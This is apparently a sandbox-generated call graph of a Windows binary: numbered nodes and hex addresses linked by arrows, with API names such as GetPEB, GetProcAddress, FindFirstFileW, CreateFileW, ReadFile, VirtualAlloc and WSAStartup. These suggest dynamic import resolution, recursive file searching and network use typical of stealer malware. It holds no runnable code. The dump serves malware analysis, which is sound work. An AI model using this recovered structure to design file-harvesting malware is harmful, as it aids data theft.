10090->10099 10092 406761 10091->10092 10093 40678a 10092->10093 10094 40677c 10092->10094 10096 4036a3 4 API calls 10093->10096 10095 4036a3 4 API calls 10094->10095 10097 406781 10095->10097 10096->10099 10098 4036a3 4 API calls 10097->10098 10098->10099 10100 406455 10099->10100 10101 4031e5 4 API calls 10100->10101 10102 406468 10101->10102 10102->10069 10102->10070 9452 40c509 9453 412093 20 API calls 9452->9453 9454 40c51e 9453->9454 9461 40910d 9462 404b22 6 API calls 9461->9462 9463 409124 9462->9463 9464 40917a 9463->9464 9465 405b6f 6 API calls 9463->9465 9466 40913e 9465->9466 9468 404b22 6 API calls 9466->9468 9472 409173 9466->9472 9467 402bab 2 API calls 9467->9464 9469 409153 9468->9469 9471 409408 15 API calls 9469->9471 9475 40916a 9469->9475 9470 402bab 2 API calls 9470->9472 9473 409164 9471->9473 9472->9467 9474 402bab 2 API calls 9473->9474 9474->9475 9475->9470 9479 410410 9480 4056bf 2 API calls 9479->9480 9481 41041b 9480->9481 9482 412093 20 API calls 9481->9482 9483 41043c 9482->9483 9484 413aca 4 API calls 9483->9484 9485 410449 9484->9485 9486 405695 2 API calls 9485->9486 9487 410454 9486->9487 9514 40c71a 9515 41219c 14 API calls 9514->9515 9516 40c728 9515->9516 10158 410b1a 10159 404bee 6 API calls 10158->10159 10161 410b31 10159->10161 10160 410c6d 10161->10160 10162 404bee 6 API calls 10161->10162 10163 410b5a 10162->10163 10164 404bee 6 API calls 10163->10164 10165 410b69 10164->10165 10166 404bee 6 API calls 10165->10166 10167 410b78 10166->10167 10168 404ba7 4 API calls 10167->10168 10169 410b86 10168->10169 10170 404ba7 4 API calls 10169->10170 10171 410b95 10170->10171 10171->10160 10172 405872 4 API calls 10171->10172 10173 410bd7 10172->10173 10174 405872 4 API calls 10173->10174 10175 410be8 10174->10175 10176 405872 4 API calls 10175->10176 10177 410bf9 10176->10177 10178 405781 4 API calls 10177->10178 10179 410c07 10178->10179 10180 405781 4 API calls 10179->10180 10184 410c15 10180->10184 10181 410c4e 10182 405762 4 API calls 10181->10182 10183 410c60 10182->10183 10183->10160 10185 403f9e 5 API calls 10183->10185 10184->10181 10191 405e5a 10184->10191 10185->10160 10188 4040bb 12 API calls 10189 410c44 10188->10189 10190 402bab 2 API calls 10189->10190 10190->10181 10192 402b7c 2 API calls 10191->10192 10193 405e72 10192->10193 10194 4031e5 4 API calls 10193->10194 10197 405ea3 10193->10197 10195 405e94 10194->10195 10196 402bab 2 API calls 10195->10196 10195->10197 10196->10197 10197->10181 10197->10188 10198 40f81c 10199 404bee 6 API calls 10198->10199 10200 40f833 10199->10200 10201 404bee 6 API calls 10200->10201 10215 40f94f 10200->10215 10202 40f85c 10201->10202 10203 404bee 6 API calls 10202->10203 10204 40f86b 10203->10204 10205 404bee 6 API calls 10204->10205 10206 40f87a 10205->10206 10207 404bee 6 API calls 10206->10207 10208 40f888 10207->10208 10209 404ba7 4 API calls 10208->10209 10210 40f897 10209->10210 10211 405872 4 API calls 10210->10211 10210->10215 10212 40f8d8 10211->10212 10213 405872 4 API calls 10212->10213 10214 40f8ea 10213->10214 10216 405872 4 API calls 10214->10216 10217 40f8fa 10216->10217 10218 405872 4 API calls 10217->10218 10219 40f90c 10218->10219 10220 405781 4 API calls 10219->10220 10221 40f91d 10220->10221 10222 4040bb 12 API calls 10221->10222 10223 40f92d 10222->10223 10224 405762 4 API calls 10223->10224 10225 40f93f 10224->10225 10225->10215 10226 403f9e 5 API calls 10225->10226 10226->10215 9529 402c1f 9530 4031e5 4 API calls 9529->9530 9531 402c31 LoadLibraryW 9530->9531 10236 407e1f 10237 407e2c 10236->10237 10240 407e61 10236->10240 10241 407e3e 10237->10241 10243 402bab 2 API calls 10237->10243 10245 407e51 10237->10245 10238 407eb6 10238->10245 10246 402bab 2 API calls 10238->10246 10239 407ed4 10240->10238 10247 405872 4 API calls 10240->10247 10253 407ea6 10240->10253 10241->10239 10244 402bab 2 API calls 10241->10244 10242 402bab 2 API calls 10242->10238 10243->10241 10244->10245 10245->10239 10248 402bab 2 API calls 10245->10248 10246->10245 10249 407e86 10247->10249 10248->10239 10250 405872 4 API calls 10249->10250 10251 407e96 10250->10251 10252 405872 4 API calls 10251->10252 10252->10253 10253->10238 10253->10242 9544 405924 9545 4031e5 4 API calls 9544->9545 9546 405937 StrStrW 9545->9546 10262 410927 10263 4044ee 7 API calls 10262->10263 10264 41093d 10263->10264 10265 4109a4 10264->10265 10266 4056bf 2 API calls 10264->10266 10269 410954 10266->10269 10267 4044ee 7 API calls 10267->10269 10269->10267 10270 410990 10269->10270 10271 402bab 2 API calls 10269->10271 10277 41080e 10269->10277 10272 413aca 4 API calls 10270->10272 10271->10269 10273 410998 10272->10273 10274 405695 2 API calls 10273->10274 10275 41099e 10274->10275 10276 402bab 2 API calls 10275->10276 10276->10265 10278 410821 10277->10278 10288 41091f 10278->10288 10289 410701 10278->10289 10281 405872 4 API calls 10282 410900 10281->10282 10283 405872 4 API calls 10282->10283 10284 41090d 10283->10284 10285 405872 4 API calls 10284->10285 10286 410919 10285->10286 10287 402bab 2 API calls 10286->10287 10287->10288 10288->10269 10290 405f08 4 API calls 10289->10290 10292 410713 10290->10292 10291 410804 10291->10281 10291->10288 10292->10291 10293 402b7c 2 API calls 10292->10293 10294 410748 10293->10294 10296 402b7c 2 API calls 10294->10296 10298 4107fd 10294->10298 10295 402bab 2 API calls 10295->10291 10299 4107ad 10296->10299 10297 402bab 2 API calls 10297->10298 10298->10295 10299->10297 10300 40d726 10301 404bee 6 API calls 10300->10301 10302 40d73f 10301->10302 10303 40db63 10302->10303 10304 405872 4 API calls 10302->10304 10307 40d761 10304->10307 10305 404bee 6 API calls 10305->10307 10306 405872 4 API calls 10306->10307 10307->10305 10307->10306 10309 40d971 10307->10309 10308 404ba7 4 API calls 10308->10309 10309->10308 10310 405781 4 API calls 10309->10310 10314 40d9bb 10309->10314 10310->10309 10311 404c4e 6 API calls 10311->10314 10312 405781 4 API calls 10312->10314 10313 4037be 4 API calls 10313->10314 10314->10303 10314->10311 10314->10312 10314->10313 10315 405872 4 API calls 10314->10315 10315->10314 9602 40f12f 9603 41219c 14 API calls 9602->9603 9604 40f13f 9603->9604 9605 41219c 14 API calls 9604->9605 9606 40f14c 9605->9606 9607 41219c 14 API calls 9606->9607 9608 40f159 9607->9608 9609 41219c 14 API calls 9608->9609 9610 40f166 9609->9610 9617 40ed35 9618 4056bf 2 API calls 9617->9618 9619 40ed42 9618->9619 9620 412093 20 API calls 9619->9620 9621 40ed63 9620->9621 9622 412093 20 API calls 9621->9622 9623 40ed73 9622->9623 9624 413aca 4 API calls 9623->9624 9625 40ed80 9624->9625 9626 405695 2 API calls 9625->9626 9627 40ed8e 9626->9627 8071 40f3c5 8076 41219c 8071->8076 8074 41219c 14 API calls 8075 40f3e1 8074->8075 8077 4121b1 8076->8077 8093 40f3d3 8076->8093 8078 4121be 8077->8078 8082 4121c5 8077->8082 8124 413ba4 8078->8124 8080 4121ca 8094 404056 8080->8094 8082->8080 8087 412210 8082->8087 8083 4121c3 8083->8093 8101 405b6f 8083->8101 8086 41224d 8091 402bab 2 API calls 8086->8091 8086->8093 8087->8093 8129 403fbf 8087->8129 8091->8093 8093->8074 8140 402b7c GetProcessHeap RtlAllocateHeap 8094->8140 8096 404066 8098 404095 8096->8098 8142 4031e5 8096->8142 8098->8083 8100 402bab 2 API calls 8100->8098 8102 405b7d 8101->8102 8103 402b7c 2 API calls 8102->8103 8104 405b99 8103->8104 8113 405c02 8104->8113 8178 4059b8 8104->8178 8106 405c09 8108 402bab 2 API calls 8106->8108 8107 405bba 8107->8106 8109 402b7c 2 API calls 8107->8109 8108->8113 8110 405bdd 8109->8110 8110->8106 8111 405be4 8110->8111 8112 402bab 2 API calls 8111->8112 8112->8113 8113->8086 8114 413a58 8113->8114 8115 413a63 8114->8115 8123 412245 8114->8123 8115->8123 8181 405781 8115->8181 8118 405781 4 API calls 8119 413aa0 8118->8119 8184 4057df 8119->8184 8122 405781 4 API calls 8122->8123 8137 402bab 8123->8137 8125 413bad 8124->8125 8126 404056 6 API calls 8125->8126 8128 413bb8 8125->8128 8127 413bc5 8126->8127 8127->8083 8128->8083 8130 402b7c 2 API calls 8129->8130 8131 403fcf 8130->8131 8136 403ff4 8131->8136 8303 403b98 8131->8303 8134 403ff8 GetLastError 8135 402bab 2 API calls 8134->8135 8135->8136 8136->8083 8138 402bb4 GetProcessHeap RtlFreeHeap 8137->8138 8139 402bc6 8137->8139 8138->8139 8139->8086 8141 402b98 8140->8141 8141->8096 8143 4031f3 8142->8143 8144 403236 8142->8144 8143->8144 8147 403208 8143->8147 8153 4030a5 8144->8153 8146 403224 8149 403258 8146->8149 8151 4031e5 4 API calls 8146->8151 8159 403263 8147->8159 8149->8098 8149->8100 8150 40320d 8150->8149 8152 4030a5 4 API calls 8150->8152 8151->8149 8152->8146 8165 402ca4 8153->8165 8155 4030b0 8156 4030b5 8155->8156 8169 4030c4 8155->8169 8156->8146 8160 40326d 8159->8160 8161 402b7c 2 API calls 8160->8161 8164 4032b7 8160->8164 8162 40328c 8161->8162 8163 402b7c 2 API calls 8162->8163 8163->8164 8164->8150 8166 403079 8165->8166 8167 40307c 8166->8167 8173 40317b GetPEB 8166->8173 8167->8155 8171 4030eb 8169->8171 8170 4030c0 8170->8146 8171->8170 8175 402c03 8171->8175 8174 40319b 8173->8174 8174->8167 8176 4031e5 3 API calls 8175->8176 8177 402c15 GetProcAddress 8176->8177 8177->8170 8179 4031e5 4 API calls 8178->8179 8180 4059cb 8179->8180 8180->8107 8199 405797 8181->8199 8183 405792 8183->8118 8185 405832 8184->8185 8186 4057eb 8184->8186 8185->8122 8185->8123 8186->8185 8209 4040bb 8186->8209 8189 405839 8191 405853 8189->8191 8236 405627 8189->8236 8190 40582c 8233 403f9e 8190->8233 8247 405762 8191->8247 8197 403f9e 5 API calls 8197->8185 8200 4057a1 8199->8200 8201 4057bd 8199->8201 8200->8201 8203 4056fc 8200->8203 8201->8183 8204 405714 8203->8204 8205 402b7c 2 API calls 8204->8205 8206 405730 8205->8206 8207 402bab 2 API calls 8206->8207 8208 405752 8206->8208 8207->8208 8208->8201 8210 4031e5 4 API calls 8209->8210 8211 4040d5 CreateFileW 8210->8211 8212 4040f8 8211->8212 8213 40418d 8211->8213 8214 4031e5 4 API calls 8212->8214 8215 404183 8213->8215 8253 403c90 8213->8253 8221 404105 8214->8221 8215->8185 8215->8189 8215->8190 8218 40416d 8250 403c40 8218->8250 8221->8218 8225 4031e5 4 API calls 8221->8225 8223 4040bb 9 API calls 8226 4041c8 8223->8226 8224 402bab 2 API calls 8224->8215 8227 404131 VirtualAlloc 8225->8227 8226->8224 8227->8218 8228 404142 8227->8228 8229 4031e5 4 API calls 8228->8229 8230 40414f ReadFile 8229->8230 8230->8218 8231 404160 8230->8231 8232 4031e5 4 API calls 8231->8232 8232->8218 8234 4031e5 4 API calls 8233->8234 8235 403fb1 VirtualFree 8234->8235 8235->8185 8237 4031e5 4 API calls 8236->8237 8238 40563a 8237->8238 8239 405872 8238->8239 8241 405881 8239->8241 8240 4058bc 8243 405797 4 API calls 8240->8243 8244 4058af 8240->8244 8241->8240 8300 4058d4 8241->8300 8243->8244 8244->8191 8246 405781 4 API calls 8246->8240 8248 405781 4 API calls 8247->8248 8249 405770 8248->8249 8249->8197 8251 4031e5 4 API calls 8250->8251 8252 403c52 FindCloseChangeNotification 8251->8252 8252->8215 8254 403ca3 8253->8254 8257 403caa 8253->8257 8280 405dc5 8254->8280 8256 404056 6 API calls 8258 403cbe 8256->8258 8257->8256 8259 403d3a 8257->8259 8260 403d2e 8258->8260 8261 403d17 8258->8261 8262 403ccf 8258->8262 8259->8215 8276 403c59 8259->8276 8260->8259 8263 402bab 2 API calls 8260->8263 8264 405b6f 6 API calls 8261->8264 8265 405b6f 6 API calls 8262->8265 8263->8259 8267 403d14 8264->8267 8266 403cdd 8265->8266 8268 405b6f 6 API calls 8266->8268 8269 402bab 2 API calls 8267->8269 8270 403cee 8268->8270 8269->8260 8270->8267 8285 403d4d 8270->8285 8273 403d0b 8275 402bab 2 API calls 8273->8275 8275->8267 8277 403c21 8276->8277 8278 4031e5 4 API calls 8277->8278 8279 403c33 8278->8279 8279->8223 8279->8226 8294 406799 8280->8294 8282 405dd5 8283 402b7c 2 API calls 8282->8283 8284 405dfe 8283->8284 8284->8257 8297 403bb7 8285->8297 8287 403cfe 8287->8273 8288 403c62 8287->8288 8289 403d4d 5 API calls 8288->8289 8290 403c6d 8289->8290 8291 403c72 8290->8291 8292 4031e5 4 API calls 8290->8292 8291->8273 8293 403c87 CreateDirectoryW 8292->8293 8293->8273 8295 4031e5 4 API calls 8294->8295 8296 4067ad 8295->8296 8296->8282 8298 4031e5 4 API calls 8297->8298 8299 403bc9 GetFileAttributesW 8298->8299 8299->8287 8301 405797 4 API calls 8300->8301 8302 4058a8 8301->8302 8302->8244 8302->8246 8304 4031e5 4 API calls 8303->8304 8305 403baa 8304->8305 8305->8134 8305->8136 9742 40ebc6 9743 4040bb 12 API calls 9742->9743 9744 40ebdf 9743->9744 9745 40ecd7 9744->9745 9762 407795 9744->9762 9748 40eccd 9750 403f9e 5 API calls 9748->9750 9749 4056bf 2 API calls 9760 40ec12 9749->9760 9750->9745 9751 40ecb5 9752 402bab 2 API calls 9751->9752 9753 40ecbd 9752->9753 9754 413aca 4 API calls 9753->9754 9755 40ecc7 9754->9755 9757 405695 2 API calls 9755->9757 9756 407908 GetProcessHeap RtlAllocateHeap 9756->9760 9757->9748 9758 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap RtlFreeHeap 9758->9760 9760->9751 9760->9756 9760->9758 9761 402bab GetProcessHeap RtlFreeHeap 9760->9761 9773 412269 9760->9773 9761->9760 9764 4077ab 9762->9764 9763 4077b3 9763->9748 9763->9749 9764->9763 9780 405ae9 9764->9780 9766 4077e1 9766->9763 9767 407802 9766->9767 9768 4077f8 9766->9768 9770 402b7c 2 API calls 9767->9770 9769 402bab 2 API calls 9768->9769 9769->9763 9771 407811 9770->9771 9772 402bab 2 API calls 9771->9772 9772->9763 9796 40374e 9773->9796 9776 412299 9776->9760 9779 402bab 2 API calls 9779->9776 9781 405af7 9780->9781 9782 402b7c 2 API calls 9781->9782 9783 405b03 9782->9783 9792 405b5a 9783->9792 9793 405998 9783->9793 9785 405b21 9786 405b61 9785->9786 9787 402b7c 2 API calls 9785->9787 9788 402bab 2 API calls 9786->9788 9789 405b39 9787->9789 9788->9792 9789->9786 9790 405b40 9789->9790 9791 402bab 2 API calls 9790->9791 9791->9792 9792->9766 9794 4031e5 4 API calls 9793->9794 9795 4059ab 9794->9795 9795->9785 9797 402b7c 2 API calls 9796->9797 9798 40375f 9797->9798 9799 4031e5 4 API calls 9798->9799 9802 4037a3 9798->9802 9800 40378f 9799->9800 9801 402bab 2 API calls 9800->9801 9800->9802 9801->9802 9802->9776 9803 4037be 9802->9803 9804 4031e5 4 API calls 9803->9804 9805 4037e2 9804->9805 9806 40382b 9805->9806 9807 402b7c 2 API calls 9805->9807 9806->9779 9808 403802 9807->9808 9809 403832 9808->9809 9811 403809 9808->9811 9810 4036a3 4 API calls 9809->9810 9810->9806 9812 4036a3 4 API calls 9811->9812 9812->9806 8903 410cd1 8908 412093 8903->8908 8906 412093 20 API calls 8907 410cff 8906->8907 8910 4120a5 8908->8910 8929 410cf1 8908->8929 8909 4120b3 8911 404056 6 API calls 8909->8911 8910->8909 8914 412100 8910->8914 8912 4120ba 8911->8912 8913 405b6f 6 API calls 8912->8913 8915 412152 8912->8915 8912->8929 8916 412125 8913->8916 8918 403fbf 7 API calls 8914->8918 8914->8929 8930 403d74 8915->8930 8916->8915 8921 412139 8916->8921 8922 41214d 8916->8922 8918->8912 8920 41218c 8926 402bab 2 API calls 8920->8926 8920->8929 8925 402bab 2 API calls 8921->8925 8924 402bab 2 API calls 8922->8924 8923 402bab 2 API calls 8923->8920 8924->8915 8927 41213e 8925->8927 8926->8929 8928 402bab 2 API calls 8927->8928 8928->8929 8929->8906 8931 403d87 8930->8931 8932 403ea3 8931->8932 8933 405b6f 6 API calls 8931->8933 8934 405b6f 6 API calls 8932->8934 8935 403da3 8933->8935 8936 403eb9 8934->8936 8935->8932 8937 4031e5 4 API calls 8935->8937 8938 4031e5 4 API calls 8936->8938 8945 403f6f 8936->8945 8939 403dbc FindFirstFileW 8937->8939 8940 403ed3 FindFirstFileW 8938->8940 8952 403e9c 8939->8952 8961 403dd1 8939->8961 8944 403ee8 8940->8944 8959 403f8d 8940->8959 8941 402bab 2 API calls 8941->8945 8942 402bab 2 API calls 8942->8932 8943 4031e5 4 API calls 8946 403e84 FindNextFileW 8943->8946 8949 405b6f 6 API calls 8944->8949 8950 4031e5 4 API calls 8944->8950 8955 403f75 8944->8955 8963 402bab 2 API calls 8944->8963 8973 40fa23 8944->8973 8945->8920 8945->8923 8947 403e96 8946->8947 8946->8961 8970 403bef 8947->8970 8949->8944 8951 403f50 FindNextFileW 8950->8951 8951->8944 8954 403f87 8951->8954 8952->8942 8953 405b6f 6 API calls 8953->8961 8956 403bef 5 API calls 8954->8956 8957 402bab 2 API calls 8955->8957 8956->8959 8960 403f7b 8957->8960 8958 403d74 15 API calls 8958->8961 8959->8941 8962 403bef 5 API calls 8960->8962 8961->8943 8961->8953 8961->8958 8964 402bab 2 API calls 8961->8964 8965 403f63 8961->8965 8962->8945 8963->8944 8964->8961 8966 402bab 2 API calls 8965->8966 8967 403f69 8966->8967 8968 403bef 5 API calls 8967->8968 8968->8945 8971 4031e5 4 API calls 8970->8971 8972 403c01 FindClose 8971->8972 8972->8952 8974 40fa39 8973->8974 8975 410293 8974->8975 8976 405b6f 6 API calls 8974->8976 8975->8944 8977 40ffcc 8976->8977 8977->8975 8978 4040bb 12 API calls 8977->8978 8979 40ffeb 8978->8979 8980 41028c 8979->8980 8983 402b7c 2 API calls 8979->8983 9028 41027d 8979->9028 8981 402bab 2 API calls 8980->8981 8981->8975 8982 403f9e 5 API calls 8982->8980 8984 41001e 8983->8984 8985 40a423 4 API calls 8984->8985 8984->9028 8986 41004a 8985->8986 8987 4031e5 4 API calls 8986->8987 8988 41005c 8987->8988 8989 4031e5 4 API calls 8988->8989 8990 410079 8989->8990 8991 4031e5 4 API calls 8990->8991 8992 410096 8991->8992 8993 4031e5 4 API calls 8992->8993 8994 4100b0 8993->8994 8995 4031e5 4 API calls 8994->8995 8996 4100cd 8995->8996 8997 4031e5 4 API calls 8996->8997 8998 4100ea 8997->8998 9029 412516 8998->9029 9000 4100fd 9001 40642c 5 API calls 9000->9001 9002 41013e 9001->9002 9003 410142 9002->9003 9004 41019f 9002->9004 9005 40488c 5 API calls 9003->9005 9007 4031e5 4 API calls 9004->9007 9006 410151 9005->9006 9009 41019c 9006->9009 9010 404866 4 API calls 9006->9010 9021 4101bb 9007->9021 9008 41022a 9018 413a58 13 API calls 9008->9018 9009->9008 9011 40642c 5 API calls 9009->9011 9012 410163 9010->9012 9013 410201 9011->9013 9017 406c4c 6 API calls 9012->9017 9026 41018e 9012->9026 9015 410205 9013->9015 9016 41022f 9013->9016 9014 403c40 5 API calls 9014->9009 9019 4126a7 7 API calls 9015->9019 9032 4125db 9016->9032 9022 410178 9017->9022 9023 41026e 9018->9023 9019->9008 9024 4031e5 4 API calls 9021->9024 9025 406c4c 6 API calls 9022->9025 9027 402bab 2 API calls 9023->9027 9024->9009 9025->9026 9026->9014 9027->9028 9028->8982 9030 4031e5 4 API calls 9029->9030 9031 412539 9030->9031 9031->9000 9033 40488c 5 API calls 9032->9033 9034 4125ec 9033->9034 9035 41269f 9034->9035 9036 4031e5 4 API calls 9034->9036 9035->9008 9037 412609 9036->9037 9039 4031e5 4 API calls 9037->9039 9044 41268f 9037->9044 9038 403c40 5 API calls 9038->9035 9040 41262a 9039->9040 9048 412675 9040->9048 9049 4124f1 9040->9049 9042 4031e5 4 API calls 9042->9044 9044->9038 9045 412663 9047 4031e5 4 API calls 9045->9047 9046 4124f1 4 API calls 9046->9045 9047->9048 9048->9042 9050 4031e5 4 API calls 9049->9050 9051 412503 9050->9051 9051->9045 9051->9046 9238 4049dc 9239 4031e5 4 API calls 9238->9239 9240 4049ef 9239->9240 9895 40cddd 9896 405b6f 6 API calls 9895->9896 9897 40cdee 9896->9897 9898 40ce06 9897->9898 9899 413a58 13 API calls 9897->9899 9900 405b6f 6 API calls 9898->9900 9907 40ce59 9898->9907 9901 40ce00 9899->9901 9903 40ce1c 9900->9903 9902 402bab 2 API calls 9901->9902 9902->9898 9904 403d74 19 API calls 9903->9904 9903->9907 9909 40ce52 9903->9909 9906 40ce45 9904->9906 9905 402bab 2 API calls 9905->9907 9908 402bab 2 API calls 9906->9908 9906->9909 9908->9909 9909->9905 9241 40ecde 9242 412093 20 API calls 9241->9242 9243 40ecfd 9242->9243 9244 412093 20 API calls 9243->9244 9245 40ed0d 9244->9245 9249 40e8df 9250 412093 20 API calls 9249->9250 9251 40e8f8 9250->9251 9252 412093 20 API calls 9251->9252 9253 40e908 9252->9253 9260 404b22 9253->9260 9255 40e91c 9256 40e936 9255->9256 9259 40e93d 9255->9259 9267 40e944 9255->9267 9258 402bab 2 API calls 9256->9258 9258->9259 9261 402b7c 2 API calls 9260->9261 9262 404b33 9261->9262 9266 404b66 9262->9266 9276 4049b3 9262->9276 9265 402bab 2 API calls 9265->9266 9266->9255 9268 4056bf 2 API calls 9267->9268 9269 40e952 9268->9269 9270 40e976 9269->9270 9271 4057df 13 API calls 9269->9271 9270->9256 9272 40e966 9271->9272 9273 413aca 4 API calls 9272->9273 9274 40e970 9273->9274 9275 405695 2 API calls 9274->9275 9275->9270 9277 4031e5 4 API calls 9276->9277 9278 4049c6 9277->9278 9278->9265 9278->9266 9279 4139de 9288 413855 9279->9288 9281 4139f1 9282 413838 GetProcessHeap RtlAllocateHeap GetProcAddress GetPEB 9281->9282 9283 4139f7 9282->9283 9284 413866 59 API calls 9283->9284 9285 413a2d 9284->9285 9286 413b81 GetProcessHeap RtlAllocateHeap GetProcAddress GetPEB 9285->9286 9287 413a34 9286->9287 9289 4031e5 4 API calls 9288->9289 9290 413864 9289->9290 9290->9290 9915 4116e7 9916 4117ba 9915->9916 9917 4117f1 9916->9917 9918 405b6f 6 API calls 9916->9918 9919 4117d0 9918->9919 9919->9917 9920 404cbf 8 API calls 9919->9920 9921 4117eb 9920->9921 9922 402bab 2 API calls 9921->9922 9922->9917 9310 4094e7 9311 404b22 6 API calls 9310->9311 9312 4094fe 9311->9312 9313 409554 9312->9313 9314 405b6f 6 API calls 9312->9314 9315 409514 9314->9315 9317 404b22 6 API calls 9315->9317 9322 40954d 9315->9322 9316 402bab 2 API calls 9316->9313 9318 40952d 9317->9318 9319 409408 15 API calls 9318->9319 9324 409544 9318->9324 9321 40953e 9319->9321 9320 402bab 2 API calls 9320->9322 9323 402bab 2 API calls 9321->9323 9322->9316 9323->9324 9324->9320 9333 4058ea 9334 4031e5 4 API calls 9333->9334 9335 4058fd StrStrA 9334->9335 9967 40d4ea 9968 404bee 6 API calls 9967->9968 9969 40d500 9968->9969 9970 40d5a0 9969->9970 9971 404bee 6 API calls 9969->9971 9972 40d529 9971->9972 9973 404bee 6 API calls 9972->9973 9974 40d537 9973->9974 9975 404bee 6 API calls 9974->9975 9976 40d546 9975->9976 9976->9970 9977 405872 4 API calls 9976->9977 9978 40d56d 9977->9978 9979 405872 4 API calls 9978->9979 9980 40d57c 9979->9980 9981 405872 4 API calls 9980->9981 9982 40d58e 9981->9982 9983 405872 4 API calls 9982->9983 9983->9970 9984 40a3ea 9985 40374e 6 API calls 9984->9985 9986 40a403 9985->9986 9987 40a419 9986->9987 9988 4059d8 4 API calls 9986->9988 9989 40a411 9988->9989 9990 402bab 2 API calls 9989->9990 9990->9987 9373 404df3 WSAStartup 9377 4091f6 9378 404b22 6 API calls 9377->9378 9379 40920b 9378->9379 9380 409222 9379->9380 9381 409408 15 API calls 9379->9381 9382 40921c 9381->9382 9383 402bab 2 API calls 9382->9383 9383->9380 10017 4117fe 10018 404c4e 6 API calls 10017->10018 10019 411888 10018->10019 10020 404c4e 6 API calls 10019->10020 10022 411925 10019->10022 10021 4118ab 10020->10021 10021->10022 10036 4119b3 10021->10036 10024 4118c5 10025 4119b3 4 API calls 10024->10025 10026 4118d0 10025->10026 10026->10022 10027 4056bf 2 API calls 10026->10027 10028 4118fd 10027->10028 10029 405872 4 API calls 10028->10029 10030 41190a 10029->10030 10031 405872 4 API calls 10030->10031 10032 411915 10031->10032 10033 413aca 4 API calls 10032->10033 10034 41191f 10033->10034 10035 405695 2 API calls 10034->10035 10035->10022 10037 4119c6 10036->10037 10039 4119bf 10036->10039 10038 4031e5 4 API calls 10037->10038 10038->10039 10039->10024 9387 40e880 9388 41219c 14 API calls 9387->9388 9389 40e88e 9388->9389 9390 41219c 14 API calls 9389->9390 9391 40e89c 9390->9391 10103 40e48a 10104 404bee 6 API calls 10103->10104 10106 40e4d0 10104->10106 10105 40e4f4 10106->10105 10107 405872 4 API calls 10106->10107 10107->10105 9488 410390 9489 404b22 6 API calls 9488->9489 9490 4103a5 9489->9490 9491 410409 9490->9491 9492 405b6f 6 API calls 9490->9492 9496 4103ba 9492->9496 9493 410402 9494 402bab 2 API calls 9493->9494 9494->9491 9495 402bab 2 API calls 9495->9493 9496->9493 9497 403d74 19 API calls 9496->9497 9500 4103fb 9496->9500 9498 4103ee 9497->9498 9499 402bab 2 API calls 9498->9499 9498->9500 9499->9500 9500->9495 10118 40ed96 10119 4040bb 12 API calls 10118->10119 10133 40edb0 10119->10133 10120 40ef90 10121 40ef87 10122 403f9e 5 API calls 10121->10122 10122->10120 10123 405ae9 6 API calls 10123->10133 10124 412269 6 API calls 10124->10133 10125 40ef61 10127 40ef6e 10125->10127 10129 402bab 2 API calls 10125->10129 10126 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap RtlFreeHeap 10126->10133 10128 40ef7c 10127->10128 10130 402bab 2 API calls 10127->10130 10128->10121 10131 402bab 2 API calls 10128->10131 10129->10127 10130->10128 10131->10121 10132 402bab GetProcessHeap RtlFreeHeap 10132->10133 10133->10120 10133->10121 10133->10123 10133->10124 10133->10125 10133->10126 10133->10132 10134 40ef98 10135 404c4e 6 API calls 10134->10135 10136 40efb6 10135->10136 10137 40f02a 10136->10137 10149 40f054 10136->10149 10140 404bee 6 API calls 10141 40efda 10140->10141 10142 404bee 6 API calls 10141->10142 10143 40efe9 10142->10143 10143->10137 10144 405872 4 API calls 10143->10144 10145 40f008 10144->10145 10146 405872 4 API calls 10145->10146 10147 40f01a 10146->10147 10148 405872 4 API calls 10147->10148 10148->10137 10150 40f064 10149->10150 10151 402b7c 2 API calls 10150->10151 10153 40f072 10151->10153 10152 40efca 10152->10140 10153->10152 10155 405ecd 10153->10155 10156 4059b8 4 API calls 10155->10156 10157 405edf 10156->10157 10157->10153 9507 410c98 9508 41219c 14 API calls 9507->9508 9509 410ca8 9508->9509 9510 41219c 14 API calls 9509->9510 9511 410cb5 9510->9511 9512 412093 20 API calls 9511->9512 9513 410cc9 9512->9513 10227 41249c 10228 4056bf 2 API calls 10227->10228 10229 4124aa 10228->10229 10230 4057df 13 API calls 10229->10230 10235 4124ce 10229->10235 10231 4124be 10230->10231 10232 413aca 4 API calls 10231->10232 10233 4124c8 10232->10233 10234 405695 2 API calls 10233->10234 10234->10235 9517 40f49e 9518 40f4b6 13 API calls 9517->9518 9519 40f4a8 9518->9519 9520 40929e 9521 413b28 6 API calls 9520->9521 9522 4092a4 9521->9522 9523 405b6f 6 API calls 9522->9523 9524 4092af 9523->9524 9525 4092c5 9524->9525 9526 409408 15 API calls 9524->9526 9527 4092bf 9526->9527 9528 402bab 2 API calls 9527->9528 9528->9525 10254 407fa4 10255 407fb7 10254->10255 10256 402b7c 2 API calls 10255->10256 10258 407fee 10255->10258 10257 40800d 10256->10257 10257->10258 10259 4037be 4 API calls 10257->10259 10260 40803c 10259->10260 10261 402bab 2 API calls 10260->10261 10261->10258 9565 4090aa 9566 404b22 6 API calls 9565->9566 9567 4090c1 9566->9567 9568 4090d8 9567->9568 9569 409408 15 API calls 9567->9569 9570 404b22 6 API calls 9568->9570 9571 4090d2 9569->9571 9572 4090eb 9570->9572 9573 402bab 2 API calls 9571->9573 9574 408c4d 15 API calls 9572->9574 9577 409104 9572->9577 9573->9568 9575 4090fe 9574->9575 9576 402bab 2 API calls 9575->9576 9576->9577 9584 409cae 9599 404b79 9584->9599 9586 409cc5 9587 409d27 9586->9587 9588 405b6f 6 API calls 9586->9588 9590 409d2f 9586->9590 9589 402bab 2 API calls 9587->9589 9591 409cec 9588->9591 9589->9590 9591->9587 9592 404b79 6 API calls 9591->9592 9593 409d05 9592->9593 9594 409d1e 9593->9594 9595 408c4d 15 API calls 9593->9595 9596 402bab 2 API calls 9594->9596 9597 409d18 9595->9597 9596->9587 9598 402bab 2 API calls 9597->9598 9598->9594 9600 404b22 6 API calls 9599->9600 9601 404b8a 9600->9601 9601->9586 10321 411fb3 10322 405b6f 6 API calls 10321->10322 10324 412013 10322->10324 10323 412075 10324->10323 10339 41206a 10324->10339 10340 411a8d 10324->10340 10326 402bab 2 API calls 10326->10323 10328 4056bf 2 API calls 10329 41203d 10328->10329 10330 405872 4 API calls 10329->10330 10331 41204a 10330->10331 10332 413aca 4 API calls 10331->10332 10333 412054 10332->10333 10334 405695 2 API calls 10333->10334 10335 41205a 10334->10335 10336 413a58 13 API calls 10335->10336 10337 412064 10336->10337 10338 402bab 2 API calls 10337->10338 10338->10339 10339->10326 10341 402b7c 2 API calls 10340->10341 10342 411aa3 10341->10342 10350 411f05 